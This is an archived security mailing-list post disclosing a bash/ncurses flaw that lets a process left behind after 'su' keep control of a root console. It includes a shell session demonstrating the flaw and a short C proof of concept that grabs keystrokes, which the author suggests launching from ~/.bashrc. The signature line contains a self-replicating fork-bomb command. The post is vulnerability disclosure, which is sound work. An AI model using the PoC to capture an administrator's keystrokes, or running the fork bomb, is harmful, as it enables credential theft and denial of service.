With bash 2.01 and ncurses 4.1, any program launched at unprivledged uid (eg. from 'su' shell) may takeover privledged user's console (to grab keystorkes or something else). I found it's quite easy when I tried to kill 'su' directly from unprivledged shell with signal 9: [root@genome /]# su lcam [lcam@genome /]$ killall -9 su Killed [root@genome /]# That was normal, but suddenly I saw again old prompt: [lcam@genome /]$ >From this point, two bash instances (unprivledged one hasn't been killed with su!) were controlling my console at once... It looks just curious: [root@genome /]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [lcam@genome /]$ id uid=502(lcam) gid=502(lcam) groups=502(lcam) [lcam@genome /]$ [root@genome /]# Of course, it isn't so scary, because it has been done manually... But is can be easily used in nasty program. Typical administrator believes that only unprivledged account may be compromised when he's launching something on it, and usually he's right, but ncurses has a vunerability which may be used to fool him. Unlike other lame su tricks, it's quite invisible (he may check on a second console - he's back in his REAL, root shell, but we can still control his console). I wrote simple program (it may be even aunched from ~/.bashrc; in the meantime, su should be killed), which is able to grab keystorke(s) from console: -- test.c -- // gcc test.c -lncurses -oanything #include <curses.h> int main() { initscr(); noecho(); raw(); while (1) if (getch()=='x') system("touch /tmp/VOILA"); } -- eof -- It isn't perfect, actually it grabs only one of first 'x's, and fail to grab next ones (a lot of i/o errors when debugged ;-). But it CAN do that. For sure it's possible to keep control much longer, as shown above (bash example). Maybe it's even possible to do it even after logout, I not checked it. _______________________________________________________________________ Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:36 PDT